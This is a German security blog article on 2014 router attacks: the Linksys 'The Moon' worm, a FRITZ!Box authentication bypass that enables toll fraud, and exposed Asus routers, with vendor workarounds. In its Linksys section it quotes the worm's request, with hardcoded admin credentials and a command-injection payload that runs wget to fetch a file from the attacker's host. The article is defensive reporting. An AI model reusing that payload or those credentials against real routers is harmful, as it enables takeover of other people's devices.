Dipl.-Inform. Carsten Eilers

Bisher ist wenig über den Angriff bekannt. Betroffen sind anscheinend die Modelle E1200 mit einer älteren Firmware als der aktuellen Version 2.0.06 und E1000 (das von Linksys nicht mehr unterstützt wird). Kompromittierte Router scannen die Ports 80 und 8080 so schnell es die Bandbreite der Netzwerkverbindung her gibt.

Wird ein offener Port 80 oder 8080 gefunden, wird der Request

GET /HNAP1/

gesendet. Das Home Network Administration Protocol (HNAP, Beschreibung als PDF) von Cisco dient der Fernwartung der Router. Inzwischen wurde der Code des Wurms in einem Honeypot gefunden. Nach der Kontaktaufnahme wird ein weiterer Request mit den Zugangsdaten admin/&i1*@U$6xvcG für die HTTP Basic Authentication gesendet, der dekodiert folgenden Inhalt hat:

submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
    `cd /tmp;if [ ! -e .L26 ];then wget http://[IP-Adresse des Angreifers]:193/0Rx.mid;fi`
&StartEPI=1

Es wird also ein Shell-Befehl eingeschleust, der den angegriffenen Router anweist, eine Datei mit vermutlich weitere Anweisungen von Port 193 des angreifenden Routers zu laden. Diese zweite Stufe des Angriffs wurde noch nicht entdeckt. Daher ist auch noch unklar, was die Angreifer bezwecken. Auch ist noch nicht bekannt, ob die Zugangsdaten überhaupt eine Bedeutung haben und wenn ja, welche. Im schlimmsten Fall handelt es sich um ein undokumentiertes Default-Passwort.

Ziel: Manipulation der DNS-Einträge?

Bei einigen kompromittierten Routern wurde eventuell der Eintrag für den DNS-Server auf Googles DNS-Server 8.8.8.8 oder 8.8.4.4 geändert. Die Änderung des DNS-Servers ist sicher ein für die Cyberkriminellen interessanter Angriff, siehe den DNS-Changer-Schädling, aber normalerweise würden die Cyberkriminellen einen DNS-Server unter ihrer Kontrolle eintragen und nicht Googles bekannte Server. Vielleicht ist das aber auch nur ein erster Test, ob die Änderung des DNS-Servers überhaupt möglich ist, und erst wenn die Cyberkriminellen eine für ihre Zwecke ausreichend große Anzahl Router unter ihrer Kontrolle haben wird ein bösartiger DNS-Server eingetragen.

Update 20.2.:

• Johannes Ullrich vom ISC hat den inzwischen "The Moon" getauften Linksys-Wurm inzwischen weiter analysiert. Insgesamt werden drei Exploits durchgeführt, die Schwachstellen im Skript tmUnblock.cgi ausnutzen. Zuerst wird das Wurm-Binary auf den Router hochgeladen, danach in /tmp/Gerty kopiert und ausführbar gemacht und danach mit der den Router infizierenden IP-Adresse aufgerufen. An diese IP-Adresse wird dann ein Request gesendet, vermutlich um die erfolgreiche Infektion zu melden.
  Der anfängliche HNAP1-Request dient nur dazu, den Router zu identifizieren und fest zu stellen, ob er angreifbar ist (eine ausführliche Beschreibung von HNAP gibt es ebenfalls vom ISC).
  Änderungen an der Konfiguration hat Johannes Ullrich nicht festgestellt, allerdings sendet der Wurm einiges an Daten an eine bestimmte DynDNS-Adresse. Was genau übertragen wird, ist noch nicht bekannt.
• Linksys hat in einem Knowledgebase-Artikel einen Workaround veröffentlicht: "Remote Management", also die Fernwartung, soll ausgeschaltet und die Sicherheitsfunktion "Filter Anonymous Internet Requests" eingeschaltet werden. Ob das reicht, um die Angriff zu verhindern, oder ob es wie im Fall der FRITZ!Box trotzdem noch Möglichkeiten für einen Angriff gibt, ist noch nicht bekannt.
• Unabhängig vom Moon-Wurm wurde inzwischen eine weitere Schwachstelle in den Linksys-Routern EA2700, EA3500, E4200 und EA4500 veröffentlicht: Aus unbekannten Gründen ist teilweise aus dem Internet über Port 8083 der direkte Zugriff auf die Admin-Konsole ohne Passwortabfrage möglich, obwohl die Weboberfläche anzeigt, dass kein Zugriff möglich ist. Linksys weiß seit dem Juli 2013 von der Schwachstelle, bisher gibt es kein Update. Bei Scans wurden bis zu 30.000 (vermutlich betroffene?) Router gefunden.
• Und auch im Linksys-Router WRT120N gibt es eine neue Schwachstelle: Eine Stacküberlauf-Schwachstelle in einem ohne Authentifizierung aufrufbaren Skript erlaubt zum Beispiel das Überschreiben des Administrator-Passworts mit einem leeren Passwort und öffnet einem Angreifer damit die Tür zum Router. Und auch die Ausführung eingeschleusten Codes soll möglich sein.
  

Fritz!Box unter Beschuss

Vorige Woche warnte AVM alle FRITZ!Box-Nutzer mit aktiviertem Fernzugriff (HTTPS-Fernzugriff (Port 443) oder MyFRITZ!-Dienst): Cyberkriminelle hatten vermutlich mit ausgespähten Zugangsdaten von außen auf FRITZ!Boxen zugegriffen und kostenpflichtige Telefon-Mehrwertdienste angerufen. Als Workaround sollte der Fernzugriff auf die Router ausgeschaltet werden.

Etwas später stellte sich dann heraus, dass der Zugriff doch nicht über ausgespähte Zugangsdaten erfolgte, sondern eine Schwachstelle das Umgehen der Authentifizierung erlaubt. Die Angreifer können dann nicht nur Telefonate führen, sondern auch die auf dem Router gespeicherten Passwörter ausspähen. Betroffen sind alle Geräte , bei denen der MyFRITZ-Dienst oder der Fernzugriff eingeschaltet wurden. Als Workaround soll weiterhin der Fernzugriff ausgeschaltet werden. Egal ob der MyFRITZ-Dienst oder der Fernzugriff eingeschaltet sind oder nicht, siehe das Update vom 17.2.!

Inzwischen hat AVM Updates für viele Geräte bereitgestellt, mit denen die Schwachstelle geschlossen wird.

Sie sollten dieses Update so schnell wie möglich installieren, akut gefährdet ist Ihr Router aber nur bei aktivierten Fernzugriff (der im Auslieferungszustand ausgeschaltet ist). Ist/war der Fernzugriff aktiviert, sollten Sie Nach der Installation des Updates sollten Sie alle auf dem Router gespeicherten Passwörter ändern. Sollten Sie in der Konfiguration unbekannte IP-Telefone entdecken, müssen die gelöscht werden, da ansonsten die Angreifer darüber auf Ihre Kosten telefonieren könnten. Außerdem müssen Sie Rufumleitungen zu unbekannten Rufnummern löschen und Callthrough deaktivieren.

Update 17.2.:
Heise Security hat zusammen mit Hanno Heinrichs die aktualisierte Firmware analysiert und herausgefunden, dass der Angriff auch ohne aktivierten Fernzugang möglich ist, der Besuch einer entsprechend präparierte Webseite reicht aus. AVM betont, dass die Angriffe bisher ausschließlich von außen über Port 443 durchgeführt wurden und möchte weiter keinen Kommentar abgeben. Ja, denken die denn, nur Heise Security kann die Firmware analysieren? Die Cyberkriminellen werden darauf wohl kaum verzichten.
Es ist also jede FRITZ!Box betroffen, unabhängig von der jeweiligen Konfiguration. Wenn Sie das Update bisher nicht installiert haben, weil in ihrer FRITZ!Box der Fernzugriff ausgeschaltet ist, müssen Sie jetzt trotzdem aktiv werden. Darum: Installieren Sie das Update so schnell wie möglich - unabhängig davon, ob der Fernzugriff ein- oder ausgeschaltet ist, denn das kann einen Angriff nicht verhindern.
Ende des Updates vom 17.2.

Update 20.2.:

• AVM hat Listen der betroffenen nationalen und internationalen Modelle samt Status veröffentlicht und betont betont ausdrücklich, dass der aktuell laufende Angriff nur bei aktiviertem Fernzugriff möglich ist. Ein anderer Angriff, zum Beispiel über eine präparierte Webseite oder einen E-Mail-Anhang, kommt, wie von Heise getestet, auch ohne aktivierten Fernzugriff aus. Angesicht der ständig laufenden Drive-by-Infektionen ist das allerdings nicht ganz so beruhigend, wie AVM wohl meint. Denn die Benutzer müssen nicht auf so eine Webseite gelockt werden, auf die können sie auch beim ganz normalen Surfen stoßen.
• Außer der FRITZ!Box sind auch WLAN-Repeater und Powerline-Produkte mit WLAN-Funktion betroffen, eine Liste der Geräte wurde veröffentlicht. Heise Security konnte den bekannten FRITZ!Box-Exploit relativ einfach auf den WLAN-Repeater 300E übertragen und danach Befehle mit root-Rechten ausführen.
• Auch vier auf der FRITZ!Box basierende Speedport-Router der Telekom sind von der Schwachstelle betroffen: W 503V (Typ A), W 721V, W 722V (Typ A) und W 920V, Updates stehen zur Verfügung.

Asus-Router unter Beschuss

Die Schwachstellen in Asus-Routern und die möglichen Angriffe darauf wurden gleicht mit einem Hashtag versehen: #Asusgate! Einige seit Juni und Juli 2013 bekannte Schwachstellen wurden von Asus bisher lediglich in zwei Modellen behoben, die Updates den Benutzer aber nicht mit der nötigen Dringlichkeit bekannt gemacht. Aber selbst wenn die Benutzer die Updates installieren, sind sie nicht sicher: Es gibt schon wieder neue Schwachstellen in 12 Modellen.

Eine Liste mit 12.937 IP-Adressen von von den 2013 entdeckten Schwachstellen betroffenen Routern wurde inzwischen veröffentlicht. Auf diese Geräte kann über Anonymous Login auf den FTP-Server zugegriffen werden und/oder der Benutzername und das Passwort für AiCloud sind als Klartext in einer ohne Login herunterladbaren Datei gespeichert.

Update 20.2.:

• Unbekannte Hacker warnen die Nutzer betroffener Router, indem sie eine Textdatei mit dem Namen mit dem Titel WARNING_YOU_ARE_VULNERABLE.txt mit einer Warnung darin auf an den Router angeschlossenen Festplatten ablegen.
• Asus hat inzwischen Updates für die Router RT-N66U, RT-N66R und RT-N66W veröffentlicht.

Türen zu, denn die Cyberkriminellen stehen kurz vor der Tür!

Für die Fritz!Box gibt es Updates, alle anderen Router-Nutzer sollten versuchen, den Zugriff von außen auszuschalten - sofern das möglich ist. Im manchen Fällen hilft nicht mal das, wie die undokumentierte Hintertür in Geräten von Linksys und anderen Herstellern auf Basis von SerComm-Geräten zeigt, die Anfang Januar bekannt wurde. Es scheint, als würden sich die SOHO-Router zur Achillesferse lokaler Netze entwickeln - wieso sollen die Cyberkriminellen noch mühsam Schadsoftware auf die Clients im lokalen Netz einschleusen, wenn sie ganz einfach durch die weit offen stehende Hintertür in den Router spazieren können, um dann dort Daten auszuspähen oder als Man-in-the-Middle in der Internetverbindung des lokalen Netzes zu sitzen?

Carsten Eilers